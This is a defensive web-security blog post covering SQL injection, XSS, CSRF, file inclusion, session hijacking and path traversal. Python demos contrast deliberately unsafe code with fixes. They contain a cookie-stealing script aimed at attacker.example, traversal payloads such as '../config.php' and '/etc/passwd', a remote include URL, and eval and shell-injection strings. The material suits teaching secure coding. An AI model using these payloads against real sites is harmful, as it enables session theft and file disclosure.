
Posted on: September 21, 2017. Updated: December 1, 2017.

Sneak peek at the security aspect of programming

I feel that at some point I would have to say a few words on the topic, so why not right at the start. In my opinion, security of the code should always be evaluated on equal terms with functionality, because what good is working code if you have to rewrite it once it's compromised? Not to mention the potential damage that can result from neglecting the security aspect. However, I believe that most vulnerabilities pop up not due to lack of focus or carelessness but because of not knowing about the dangers and traps when coding. I'm not saying I know it all, because I don't, and I can't even guarantee you that all the code posted on this website will be 100% secure, but I will keep an eye on it and do what I can to deliver safe code. Anyway, I wanted to point out the vulnerabilities that are best known and most exploited and that apply to multiple languages. There are also guidelines on how to write more secure code in general, especially in PHP, since it's a very broad language, even considered both a framework and a language. Links to further information will be provided.

SQL injection

This attack targets the application's database. Untrusted input is concatenated into an SQL statement, so the attacker can change the statement the database actually executes. Depending on the database engine and the privileges of the application's database account, that allows reading private data, bypassing authentication, inserting or modifying rows, creating or dropping tables, or writing query results to the server's disk. It is very dangerous, especially for large databases of large companies that store very private information about their users, such as medical data. The injection points are everything the application feeds into a query: form fields, URL parameters, cookies and HTTP headers. Along with XSS, it is one of the most common attacks on a global scale.

XSS and CSRF

XSS (cross-site scripting) targets the users of a website or web application: the attacker gets the victim's browser to run client-side code, usually JavaScript, that the attacker chose, for example to redirect the victim to a malicious site or to steal the session cookie and other private data. The code is injected through any input that is later written into a page without proper output encoding: element content, attribute values, URLs in links, and even CSS or script contexts, whether the input is reflected back immediately or stored and shown to other users later. CSRF (cross-site request forgery) is a different attack: the attacker tricks the victim's browser into sending a request the user never intended, to change the password of a particular service for instance, and the browser attaches the victim's session cookie to it automatically. The two are related in practice: an XSS vulnerability generally defeats CSRF protections as well, because script running in the page's origin can read the anti-CSRF token and submit the forged request itself.
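
As an added example (not from the original post, and written in Python rather than PHP so it runs stand-alone), the block below pairs the two defences the paragraph implies: output encoding of user-supplied content for the element-content context, and a per-session anti-CSRF token checked on the state-changing request. The attacker payload, the host attacker.example, the form field names and the session dictionary are all constructed for the demonstration.

```python
import hmac
import html
import secrets

# Constructed attacker input: a comment that tries to ship the victim's
# cookie to a host the attacker controls.
XSS_PAYLOAD = ('<script>new Image().src="https://attacker.example/c?"'
               '+document.cookie</script>')


def render_comment_unsafe(comment):
    """Copies user input straight into the page: the browser parses the
    attacker's <script> as markup and runs it in the site's origin."""
    return '<p class="comment">' + comment + '</p>'


def render_comment_safe(comment):
    """Encodes &, <, >, " and ' so the same input is displayed as text.
    Right for element content; attribute, URL and JavaScript contexts each
    need their own encoding rules."""
    return '<p class="comment">' + html.escape(comment, quote=True) + '</p>'


def new_csrf_token():
    """Unguessable per-session token, stored server-side and emitted as a
    hidden field in every form that changes state."""
    return secrets.token_urlsafe(32)


def render_password_form(csrf_token):
    """The genuine form carries the token. A form on an attacker's site
    cannot, because the attacker's origin cannot read this page."""
    return ('<form method="post" action="/change-password">'
            '<input type="hidden" name="csrf" value="%s">'
            '<input type="password" name="new_password">'
            '<button>Change</button></form>' % html.escape(csrf_token, quote=True))


def handle_password_change(session, form):
    """Server-side handler: reject unless the submitted token matches the
    one bound to the session, compared in constant time."""
    expected = session.get("csrf")
    submitted = form.get("csrf")
    if not expected or not submitted or not hmac.compare_digest(expected, submitted):
        return 403, "CSRF token missing or invalid"
    session["password"] = form["new_password"]
    return 200, "password changed"


def demo():
    """Encoder neutralises the payload; the token blocks a forged request
    and lets the genuine form through."""
    session = {"csrf": new_csrf_token(), "password": "old"}
    forged = {"new_password": "pwned"}              # cross-site form: no token
    genuine = {"csrf": session["csrf"], "new_password": "new"}
    return {
        "unsafe_has_script": "<script>" in render_comment_unsafe(XSS_PAYLOAD),
        "safe_has_script": "<script>" in render_comment_safe(XSS_PAYLOAD),
        "safe_output": render_comment_safe(XSS_PAYLOAD),
        "form": render_password_form(session["csrf"]),
        "forged_status": handle_password_change(session, forged)[0],
        "password_after_forgery": session["password"],
        "genuine_status": handle_password_change(session, genuine)[0],
        "password_after_genuine": session["password"],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The token check is exactly what an XSS bug undoes: script injected into the page can read the hidden field and post the form with the right value, which is why the two vulnerabilities are so often mentioned together. Marking the session cookie SameSite adds a second, independent layer against CSRF.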

RFI and LFI

RFI (remote file inclusion) targets applications that build the name of a script to include from user input, PHP's include() and require() being the classic case. If remote URLs are accepted (allow_url_include in PHP), the attacker points the parameter at a file hosted on a server they control, usually a completely different domain, and the application executes the attacker's code. LFI (local file inclusion) is the same flaw restricted to the local file system: the attacker manipulates the path so that the application includes files it never meant to expose, such as configuration or log files, or a file the attacker previously got onto the server through an upload feature or a writable FTP directory.

There are more potential dangers lurking around, such as session hijacking and path traversal, so I'm just going to provide the links that I find useful.

1. OWASP

Probably the most important site out there when searching for knowledge. With a vast amount of information and pseudo-code examples, you can read up on practically every known class of attack. Reading it all at once would be pointless, just like Wikipedia, so look up only what you need at the moment. If you don't know what to look for, here and here are good starting points.

2. PHP security

A good manual on PHP coding that can be read in full but is just as useful to revisit when something is unclear. I recommend it to anyone who ever deals with PHP.

3. Session fixation and hijacking

It's a nasty attack that cannot be prevented completely. The single most effective measure is TLS between client and server, so the session ID cookie cannot be read off the wire; mark the cookie HttpOnly and Secure, and regenerate the session ID when the user authenticates, so that an ID an attacker fixed in the victim's browser beforehand becomes worthless. On the server side you can additionally compare the IP address and User-Agent recorded when the session was created (upon authentication) with those of the client currently presenting the session. In most cases that's fine, but users behind the same NAT share one IP address, so an attacker on the same LAN still passes the check, while users behind proxies whose IP address changes between requests will keep losing their session. References here and here.
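
To make the two server-side defences concrete, here is an added example, not code from the original post: a minimal in-memory session store in Python (PHP's session handling does the equivalent with session_regenerate_id()). It rotates the ID at login, which defeats a fixation attempt, binds the session to the User-Agent, and emits the cookie with the HttpOnly, Secure and SameSite flags. The cookie name PHPSESSID, the user-agent strings and the user "alice" are constructed for the demonstration.

```python
import secrets
import time

# Constructed client fingerprints for the demonstration.
VICTIM_UA = "Mozilla/5.0 (X11; Linux x86_64) Firefox/55.0"
ATTACKER_UA = "curl/7.55.1"


def session_cookie_header(sid):
    """Set-Cookie value for the session ID. HttpOnly keeps it away from page
    scripts (limits theft via XSS), Secure keeps it off plaintext HTTP,
    SameSite keeps it out of most cross-site requests."""
    return "PHPSESSID=%s; Path=/; Secure; HttpOnly; SameSite=Lax" % sid


class SessionStore:
    """Minimal server-side session store showing two defences: a fresh ID at
    authentication (defeats fixation) and a User-Agent binding checked on
    every request (raises the bar for replaying a stolen cookie)."""

    def __init__(self):
        self._sessions = {}

    @staticmethod
    def _new_id():
        return secrets.token_urlsafe(32)        # 256 random bits, unguessable

    def start(self, user_agent):
        """Anonymous session handed to any visitor before authentication."""
        sid = self._new_id()
        self._sessions[sid] = {"user": None, "ua": user_agent, "created": time.time()}
        return sid

    def login(self, sid, user, user_agent):
        """Authenticate and rotate the ID. The pre-login ID is discarded, so an
        ID the attacker planted in the victim's browser maps to nothing."""
        old = self._sessions.pop(sid, None)
        if old is None:
            return None
        new_sid = self._new_id()
        self._sessions[new_sid] = {"user": user, "ua": user_agent, "created": time.time()}
        return new_sid

    def get_user(self, sid, user_agent):
        """Resolve a presented cookie; reject unknown IDs and a changed UA."""
        data = self._sessions.get(sid)
        if data is None or data["ua"] != user_agent:
            return None
        return data["user"]


def demo():
    """Fixation: the attacker obtains an anonymous ID, plants it in the
    victim's browser, and the victim logs in with it. Hijacking: the attacker
    replays the victim's post-login cookie from a different client."""
    store = SessionStore()
    planted = store.start(ATTACKER_UA)               # attacker's pre-auth ID
    victim_sid = store.login(planted, "alice", VICTIM_UA)
    return {
        "planted_after_login": store.get_user(planted, VICTIM_UA),
        "victim_session": store.get_user(victim_sid, VICTIM_UA),
        "replayed_from_other_client": store.get_user(victim_sid, ATTACKER_UA),
        "ids_rotated": planted != victim_sid,
        "cookie": session_cookie_header(victim_sid),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The User-Agent binding is a heuristic only: an attacker who stole the cookie through XSS or a sniffed connection can usually copy the UA string too, and binding to the IP address runs into the NAT and proxy problems described above. The rotation at login and the cookie flags are the parts worth relying on.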

4. Path traversal

Path traversal lets an attacker read files outside the directory the application meant to expose, typically with ../ sequences in a user-controlled file name, and it feeds directly into LFI when the traversed path ends up in an include. The examples in the references here and here are specific and may not apply to your case; they just show how such code can be insecure.
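
Path traversal and the local file inclusion described in the RFI and LFI section are the same bug at two different sinks, so one added example covers both. It is not code from the original post; it is Python that mirrors include('pages/' . $_GET['page']) and then shows the two fixes a practitioner would reach for: an allowlist that turns the parameter into a key instead of a path, and, where arbitrary names really must be accepted, canonicalisation of the final path plus a containment check. The directory layout, file names and the config.php contents are constructed in a temporary directory.

```python
import os
import tempfile

# Pages the application actually intends to serve (constructed for the demo).
ALLOWED_PAGES = {"home": "home.php", "about": "about.php"}


def build_site(root):
    """Create a small web root under `root`: a pages/ directory with two
    legitimate includes and a config file one level above it."""
    pages = os.path.join(root, "pages")
    os.makedirs(pages)
    for filename in ALLOWED_PAGES.values():
        with open(os.path.join(pages, filename), "w") as f:
            f.write("<?php echo '" + filename + "'; ?>\n")
    with open(os.path.join(root, "config.php"), "w") as f:
        f.write("<?php $db_password = 'constructed-secret'; ?>\n")
    return pages


def resolve_page_unsafe(pages_dir, page):
    """Mirrors include('pages/' . $_GET['page']): the user-controlled value is
    joined onto the directory with no validation, so '../' walks out of it."""
    return os.path.join(pages_dir, page)


def resolve_page_allowlist(pages_dir, page):
    """Preferred fix: the parameter is a key, never a path. Anything not in the
    map is rejected, so traversal and remote URLs cannot even be expressed."""
    filename = ALLOWED_PAGES.get(page)
    return None if filename is None else os.path.join(pages_dir, filename)


def resolve_page_contained(pages_dir, page):
    """Defence in depth when arbitrary names must be accepted: canonicalise the
    final path (resolving '..' and symlinks) and require it to stay inside
    pages_dir. Returns None for traversal, absolute paths and URLs."""
    base = os.path.realpath(pages_dir)
    candidate = os.path.realpath(os.path.join(base, page))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:              # different drives on Windows
        inside = False
    if not inside or not os.path.isfile(candidate):
        return None
    return candidate


def demo():
    """Leak config.php through the unsafe resolver, then show both fixes
    rejecting the same payloads while still serving a legitimate page."""
    root = tempfile.mkdtemp()
    pages = build_site(root)
    traversal = "../config.php"
    with open(resolve_page_unsafe(pages, traversal)) as f:
        leaked = f.read()
    return {
        "leaked": leaked,
        "allowlist_ok": resolve_page_allowlist(pages, "home"),
        "allowlist_traversal": resolve_page_allowlist(pages, traversal),
        "contained_ok": resolve_page_contained(pages, "home.php"),
        "contained_traversal": resolve_page_contained(pages, traversal),
        "contained_absolute": resolve_page_contained(pages, "/etc/passwd"),
        "contained_remote": resolve_page_contained(pages, "http://attacker.example/shell.txt"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Note the order in the containment check: normalise first, compare second. Stripping "../" from the raw string before joining is the classic mistake, because encodings such as "..%2f" or "....//" survive a single pass and are decoded or collapsed later.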

5. Handling file permissions

A good deal of information on how to handle file permissions for the different kinds of visitors to a Linux server across different protocols. Here is an even broader discussion of the topic.

6. Exploitable functions

When it comes to built-in functions, some can be exploited when certain conditions are met, typically when untrusted input reaches them. For PHP, here is probably the best list and argumentation I've seen. Similarly, a list of exploitable Python functions can be found here.
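
To show what "exploitable when certain conditions are met" looks like in practice, here is an added example (not from the original post or the linked lists) with two of the usual Python suspects, eval() and subprocess with shell=True, next to the replacements that do the same job without the risk. The inputs are constructed; the code-execution payload merely calls os.getcwd() to prove that arbitrary code ran, and the shell part assumes a POSIX shell and an echo binary.

```python
import ast
import subprocess

# Constructed untrusted inputs: what a request parameter might carry.
HARMLESS = "{'debug': False, 'port': 8080}"
CODE_PAYLOAD = "__import__('os').getcwd()"      # stands in for something nasty
SHELL_PAYLOAD = "hello; echo INJECTED"


def parse_setting_unsafe(text):
    """eval() on untrusted text: any expression runs with the app's privileges."""
    return eval(text)


def parse_setting_safe(text):
    """ast.literal_eval accepts only Python literals (numbers, strings, tuples,
    lists, dicts, booleans, None) and raises on anything else."""
    return ast.literal_eval(text)


def literal_parser_rejects(text):
    """True if the safe parser refuses the input instead of evaluating it."""
    try:
        ast.literal_eval(text)
    except (ValueError, SyntaxError):
        return True
    return False


def echo_unsafe(arg):
    """shell=True hands the whole string to /bin/sh, so metacharacters in the
    argument (';', '|', '$(...)') become additional commands. Returns the
    output lines. Assumes a POSIX shell."""
    result = subprocess.run("echo " + arg, shell=True, capture_output=True, text=True)
    return result.stdout.splitlines()


def echo_safe(arg):
    """Pass an argv list: no shell is involved and the argument reaches echo
    verbatim, whatever characters it contains."""
    result = subprocess.run(["echo", arg], capture_output=True, text=True)
    return result.stdout.splitlines()


def demo():
    """Contrast each dangerous function with its safe counterpart."""
    return {
        "eval_ran_code": isinstance(parse_setting_unsafe(CODE_PAYLOAD), str),
        "literal_ok": parse_setting_safe(HARMLESS),
        "literal_rejects_code": literal_parser_rejects(CODE_PAYLOAD),
        "shell_unsafe_lines": echo_unsafe(SHELL_PAYLOAD),
        "shell_safe_lines": echo_safe(SHELL_PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The condition that makes these functions exploitable is the same in every language: data from outside the trust boundary reaches a function whose argument is interpreted as code or as a command line. The PHP equivalents on the linked list (eval, system, exec, passthru, unserialize on untrusted data, and so on) fail for the same reason.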

